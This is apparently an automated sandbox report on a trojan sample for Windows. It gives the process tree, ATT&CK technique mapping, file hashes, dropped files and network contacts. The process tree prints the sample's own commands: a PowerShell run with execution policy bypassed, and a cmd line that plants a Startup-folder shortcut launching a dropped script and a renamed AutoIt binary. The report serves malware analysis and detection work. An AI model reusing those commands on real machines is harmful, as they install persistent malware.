Windows
Analysis Report
T6l6gPxwQU.exe
Overview
General Information
Sample name: | T6l6gPxwQU.exe (renamed because original name is a hash value) |
Original sample name: | fca042b18adf613d9a2be1646663698f.exe |
Analysis ID: | 1528376 |
MD5: | fca042b18adf613d9a2be1646663698f |
SHA1: | a7c91cd17ceeb8b1d0ac9873723f2b35487ca50c |
SHA256: | 3e358ac78679758f3720dd60d4e5fdff8323f2de436add34238d39c9bf969460 |
Tags: | 64exe |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- T6l6gPxwQU.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\T6l6gPxwQU.exe" MD5: FCA042B18ADF613D9A2BE1646663698F)
  - powershell.exe (PID: 7364 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
  - conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  - InformationCheck.exe (PID: 7604 cmdline: "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 MD5: C56B5F0201A3B3DE53E561FE76912BFD)
  - cmd.exe (PID: 7660 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  - conhost.exe (PID: 7668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 7904 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - SwiftWrite.pif (PID: 8028 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: C56B5F0201A3B3DE53E561FE76912BFD)
- cleanup
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems), Tim Shelton: |
Source: | Author: Max Altgelt (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: frack113: |
Source: | Author: Max Altgelt (Nextron Systems): |
Source: | Author: Michael Haag: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Data Obfuscation |
---|
Source: | Author: Joe Security: |
AV Detection |
---|
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | Code function: | 0_2_00007FF6BB1AE968 |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
System Summary |
---|
Source: | Code function: | 0_2_00007FF6BB1237B0 | |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | memstr_5e6fb49a-f | |
Source: | String found in binary or memory: | memstr_b81c1be3-9 |
Source: | COM Object queried: | Jump to behavior |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Static PE information: |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | ReversingLabs: |
Source: | Process created: | |||
Source: | Section loaded: | Jump to behavior | ||
Source: | Key value queried: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Static PE information: |
Source: | Static file information: |
Persistence and Installation Behavior |
---|
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Boot Survival |
---|
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window found: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Evasive API call chain: | ||
Source: | Evasive API call chain: |
Source: | API coverage: | ||
Source: | API coverage: | ||
Source: | API coverage: |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Process created: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 2 Native API | 1 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 21 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | 2 Valid Accounts | 2 Valid Accounts | 2 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 26 System Information Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 12 Process Injection | 211 Masquerading | LSA Secrets | 31 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 2 Valid Accounts | Cached Domain Credentials | 21 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
42% | ReversingLabs | Win64.Trojan.Povertel | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
3% | ReversingLabs | |||
3% | ReversingLabs |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
my.cloudme.com | 83.140.241.4 | true | false | unknown | |
nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs | unknown | unknown | false | unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
83.140.241.4 | my.cloudme.com | Sweden | 39369 | PORT80SE | false |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1528376 |
Start date and time: | 2024-10-07 21:29:06 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 8m 54s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes: | 12 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | T6l6gPxwQU.exe (renamed because original name is a hash value) |
Original Sample Name: | fca042b18adf613d9a2be1646663698f.exe |
Detection: | MAL |
Classification: | mal100.expl.evad.winEXE@12/10@3/1 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 7364 because it is empty
- Not all processes were analyzed, report is missing behavior information
- Report creation exceeded maximum time and may have missing disassembly code information.
- Report size exceeded maximum capacity and may have missing disassembly code.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: T6l6gPxwQU.exe
Time | Type | Description |
---|---|---|
15:29:59 | API Interceptor | |
15:30:45 | API Interceptor | |
15:31:04 | API Interceptor | |
20:30:10 | Autostart |
Match | Detection | Threat Name |
---|---|---|
83.140.241.4 | malicious | Unknown |
83.140.241.4 | malicious | Unknown |
83.140.241.4 | malicious | Unknown |
Match | Detection | Threat Name |
---|---|---|
my.cloudme.com | malicious | Unknown |
my.cloudme.com | malicious | Unknown |
my.cloudme.com | malicious | Unknown |
Match | Detection | Threat Name |
---|---|---|
PORT80SE | malicious | Unknown |
PORT80SE | malicious | Unknown |
PORT80SE | malicious | Unknown |
PORT80SE | malicious | Mirai |
PORT80SE | malicious | Mirai |
PORT80SE | malicious | Mirai, Okiru |
PORT80SE | malicious | Unknown |
PORT80SE | malicious | Moobot |
PORT80SE | malicious | Unknown |
PORT80SE | malicious | Mirai |
Match | Detection | Threat Name |
---|---|---|
3b5074b1b5d032e5620f69f9f700ff0e | malicious | Outlook Phishing, HTMLPhisher |
3b5074b1b5d032e5620f69f9f700ff0e | malicious | Unknown |
3b5074b1b5d032e5620f69f9f700ff0e | malicious | Unknown |
3b5074b1b5d032e5620f69f9f700ff0e | malicious | AgentTesla |
3b5074b1b5d032e5620f69f9f700ff0e | malicious | AgentTesla |
3b5074b1b5d032e5620f69f9f700ff0e | malicious | Credential Flusher |
3b5074b1b5d032e5620f69f9f700ff0e | malicious | AgentTesla |
3b5074b1b5d032e5620f69f9f700ff0e | malicious | Unknown |
3b5074b1b5d032e5620f69f9f700ff0e | malicious | MassLogger RAT |
3b5074b1b5d032e5620f69f9f700ff0e | malicious | Snake Keylogger, VIP Keylogger |
Match | Detection | Threat Name |
---|---|---|
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | malicious | Unknown |
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | malicious | Unknown |
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | malicious | Unknown |
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | malicious | Unknown |
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | malicious | Remcos |
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | malicious | Unknown |
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | malicious | Vidar |
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | malicious | Vidar |
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | malicious | Vidar |
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif | malicious | Unknown |
C:\Users\Public\InformationCheck.exe | malicious | Unknown |
C:\Users\Public\InformationCheck.exe | malicious | Unknown |
C:\Users\Public\InformationCheck.exe | malicious | Unknown |
C:\Users\Public\InformationCheck.exe | malicious | Unknown |
C:\Users\Public\InformationCheck.exe | malicious | Remcos |
C:\Users\Public\InformationCheck.exe | malicious | Unknown |
C:\Users\Public\InformationCheck.exe | malicious | Vidar |
C:\Users\Public\InformationCheck.exe | malicious | Vidar |
C:\Users\Public\InformationCheck.exe | malicious | Vidar |
C:\Users\Public\InformationCheck.exe | malicious | Unknown |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3485127 |
Entropy (8bit): | 4.739244309224887 |
Encrypted: | false |
SSDEEP: | 24576:qcb6NMAG7HuyDNNx+ZB8rKZsNuNxWdY74lb9UWrEiTO2yP:a |
MD5: | 3881B892AE0893A906D6CBE6DB39FE11 |
SHA1: | CF03508A1B930C37F5737227F917A6A36A6FD650 |
SHA-256: | 35287AC8E4E594323E7E7D77C697E8089E2D7B4D1D661F4E2B0E1884A78C3221 |
SHA-512: | F7C49C8302028ED05C03C6805A657B26F82AF8A856AC723FBED10DB04452609611815928FDF290D57A3D3D0FA5C45805D72D14F71424AAE83A38144941BFE681 |
Malicious: | true |
Reputation: | low |
Preview: |
Process: | C:\Users\user\Desktop\T6l6gPxwQU.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 893608 |
Entropy (8bit): | 6.620131693023677 |
Encrypted: | false |
SSDEEP: | 12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01 |
MD5: | C56B5F0201A3B3DE53E561FE76912BFD |
SHA1: | 2A4062E10A5DE813F5688221DBEB3F3FF33EB417 |
SHA-256: | 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D |
SHA-512: | 195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Reputation: | moderate, very likely benign file |
Preview: |
Process: | C:\Users\user\Desktop\T6l6gPxwQU.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 373 |
Entropy (8bit): | 5.122687847204781 |
Encrypted: | false |
SSDEEP: | 6:gsvPFyKoJFODu3Id25PaH9Ayz1gY1PaHzPMKds48QLh8JdWzH6mLF7djIXIINOQL:xv9ZoXOJrAymYEzdHGHWzH6mL5dsfHbf |
MD5: | 3E79D02E7B3EF1B1C347DBF4090CD366 |
SHA1: | 90F33D606D9E2C544F0E3C48FBF02B0080501275 |
SHA-256: | 3A54CC3C7B092F5FC5978A1A757D1FFC32C4539430433CE469662C980288137C |
SHA-512: | 8CC2F59F89414FA83246A5C7E3589C6038F23C83DE7A1EF3920AF1B57028B63C6105930675E9F99AFAC1F228712B27C2E2A8B0BC9D2DEC55EEB8C921C6D60740 |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulxmH/lZ:NllUg |
MD5: | D904BDD752B6F23D81E93ECA3BD8E0F3 |
SHA1: | 026D8B0D0F79861746760B0431AD46BAD2A01676 |
SHA-256: | B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2 |
SHA-512: | 5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Users\Public\InformationCheck.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3485124 |
Entropy (8bit): | 4.739228439290352 |
Encrypted: | false |
SSDEEP: | 24576:Dcb6NMAG7HuyDNNx+ZB8rKZsNuNxWdY74lb9UWrEiTO2yP:5 |
MD5: | F684D28C9ADBC8AA4A1CB8A64CB26FC5 |
SHA1: | 4CB15F81E6EE5D5BB7B51FB22EEE1A9D6CD44BC1 |
SHA-256: | DA2215F0068D4E839C7698C3576CF3288E84C351E7634E1A45969DB7078755E9 |
SHA-512: | EE11BF3FDE51A9A70174C10AC82CF9C834A8DA9C0003B4E5BAD6E7C65E02623F2C30CB1AE86A62C5409DDD0952946F189B16095E5DAF5E7E54388352E748786D |
Malicious: | false |
Preview: |
Process: | C:\Users\Public\InformationCheck.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 184 |
Entropy (8bit): | 4.736154105743425 |
Encrypted: | false |
SSDEEP: | 3:RiMIpGXfeNH5E5wWAX+Ro6p4EkD5yKXW/Zi+0/RaMl85uWAX+Ro6p4EkD5yKXW/f:RiJbNHCwWDKaJkDrXW/Zz0tl8wWDKaJX |
MD5: | 612D28A7A2758BAAF54DB34272446F87 |
SHA1: | D4671632FC2141EF2AB2455F8923BC5197B2FD68 |
SHA-256: | 94A83DD87CE7268703585A40C52491DDC7D332380B82832951DED047AAE6D73A |
SHA-512: | B4B64908C674F92F5D4B1E761E123957E8D5CD6C3F433D2D5C6ADD19101FD0610EE968222D4CED31E8F21F7F022D880E7E723E4171BC7DB18C37A2000A58565B |
Malicious: | true |
Preview: |
Process: | C:\Users\Public\InformationCheck.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 893608 |
Entropy (8bit): | 6.620131693023677 |
Encrypted: | false |
SSDEEP: | 12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01 |
MD5: | C56B5F0201A3B3DE53E561FE76912BFD |
SHA1: | 2A4062E10A5DE813F5688221DBEB3F3FF33EB417 |
SHA-256: | 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D |
SHA-512: | 195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C |
Malicious: | true |
Antivirus: |
|
Joe Sandbox View: |
|
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Process: | C:\Windows\SysWOW64\cmd.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98 |
Entropy (8bit): | 4.915531212533357 |
Encrypted: | false |
SSDEEP: | 3:HRAbABGQaFyw3pYot+kiE2J5yKXW/Zi+URAAy:HRYF5yjowkn23yKXW/Zzyy |
MD5: | 56D029782506F3E1F7EC40780D1DA27F |
SHA1: | C7E0690DE9B31C951AC212A7E940E460267F2BA1 |
SHA-256: | 5F412A72A3459ACA6A245DE1A280AB53CA5E6B306FECA32E0DF4B0B9B7863223 |
SHA-512: | 1C5F108FB4325E4B47E9EE15F5D828569EE90676D5170D6D3B92BD13BD39CCAA68657CBB97761007154C73D2FFCFA8A3582879CB2097A899B22C1C83848A9D92 |
Malicious: | true |
Preview: |
File type: | |
Entropy (8bit): | 7.310400449094374 |
TrID: |
|
File name: | T6l6gPxwQU.exe |
File size: | 1'974'272 bytes |
MD5: | fca042b18adf613d9a2be1646663698f |
SHA1: | a7c91cd17ceeb8b1d0ac9873723f2b35487ca50c |
SHA256: | 3e358ac78679758f3720dd60d4e5fdff8323f2de436add34238d39c9bf969460 |
SHA512: | 5109cb5cb9606c330110eee1449506abf7453d795c656b232ea12968ee481a3df698ba9a3dcc1a8c122eaa198e0b27677ab25fc4fd5e4e8909a6019b40820bdc |
SSDEEP: | 49152:x2EYTb8atv1orq+pEiSDTj1VyvBatZeI4LeO07B+Iy3AqMl1ZcK:gXbIrq3o/07B+yqm1Z |
TLSH: | EB95C01973A4419DFEABE1B6CA13C607D7B17C460277861F02A46B766F337712A2E321 |
File Content Preview: | MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG.....>PG......PG......PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(..#PG."(..*PG."(...PG.+PF..RG..9I.{PG..9D.*PG..9..*PG |
Icon Hash: | 13ebebe37b0db4f9 |
Entrypoint: | 0x14002549c |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x140000000 |
Subsystem: | windows gui |
Image File Characteristics: | EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE |
DLL Characteristics: | HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x66FC4D92 [Tue Oct 1 19:29:22 2024 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 2 |
File Version Major: | 5 |
File Version Minor: | 2 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 2 |
Import Hash: | fadc5a257419d2541a6b13dfb5e311e2 |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe5c10 | 0x17c | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xfb000 | 0xed7cc | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xf4000 | 0x6f48 | .pdata |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1e9000 | 0xa74 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc7050 | 0x1c | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0xd9aa0 | 0x28 | .rdata |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xc7070 | 0x100 | .rdata |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb5000 | 0x1138 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0xb3328 | 0xb3400 | 507a8505198e35cc9675301d53e3b1c4 | False | 0.5503358721234309 | data | 6.5212967575920215 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0xb5000 | 0x34204 | 0x34400 | 9eda36be0cf076085a2f9772c1ee5803 | False | 0.30884139503588515 | data | 5.360588077813426 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xea000 | 0x9120 | 0x5000 | ec6b77d6ef8898b0d3b7d48c042d66a0 | False | 0.040673828125 | DOS executable (block device driver) | 0.5749243362866429 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.pdata | 0xf4000 | 0x6f48 | 0x7000 | 4416e27f8be9f9271c439d2fd34d1b2d | False | 0.49612862723214285 | data | 5.911479421450324 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.rsrc | 0xfb000 | 0xed7cc | 0xed800 | bec808d7dc177cca1390dc1ada2ac9e2 | False | 0.9320888157894737 | data | 7.852477011959672 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x1e9000 | 0xa74 | 0xc00 | 5ddb0e422ace102fe530e589a0cbec6f | False | 0.4850260416666667 | data | 5.139847116863034 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0xfb518 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216 |
RT_ICON | 0xfb640 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027 |
RT_ICON | 0xfb768 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135 |
RT_ICON | 0xfb890 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | Great Britain | 0.6071763602251408 |
RT_ICON | 0xfc938 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | Great Britain | 0.525103734439834 |
RT_ICON | 0xfeee0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | Great Britain | 0.47821209258384506 |
RT_ICON | 0x103108 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | Great Britain | 0.36631964982846327 |
RT_ICON | 0x113930 | 0xc34e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9994999799991999 |
RT_MENU | 0x11fc80 | 0x50 | data | English | Great Britain | 0.9 |
RT_STRING | 0x11fcd0 | 0x594 | data | English | Great Britain | 0.3333333333333333 |
RT_STRING | 0x120264 | 0x68a | data | English | Great Britain | 0.2735961768219833 |
RT_STRING | 0x1208f0 | 0x490 | data | English | Great Britain | 0.3715753424657534 |
RT_STRING | 0x120d80 | 0x5fc | data | English | Great Britain | 0.3087467362924282 |
RT_STRING | 0x12137c | 0x65c | data | English | Great Britain | 0.34336609336609336 |
RT_STRING | 0x1219d8 | 0x466 | data | English | Great Britain | 0.3605683836589698 |
RT_STRING | 0x121e40 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186 |
RT_RCDATA | 0x121f98 | 0xc62e0 | data | 1.00031537036307 | ||
RT_GROUP_ICON | 0x1e8278 | 0x4c | data | English | Great Britain | 0.8157894736842105 |
RT_GROUP_ICON | 0x1e82c4 | 0x14 | data | English | Great Britain | 1.25 |
RT_GROUP_ICON | 0x1e82d8 | 0x14 | data | English | Great Britain | 1.15 |
RT_GROUP_ICON | 0x1e82ec | 0x14 | data | English | Great Britain | 1.25 |
RT_VERSION | 0x1e8300 | 0xdc | data | English | Great Britain | 0.6181818181818182 |
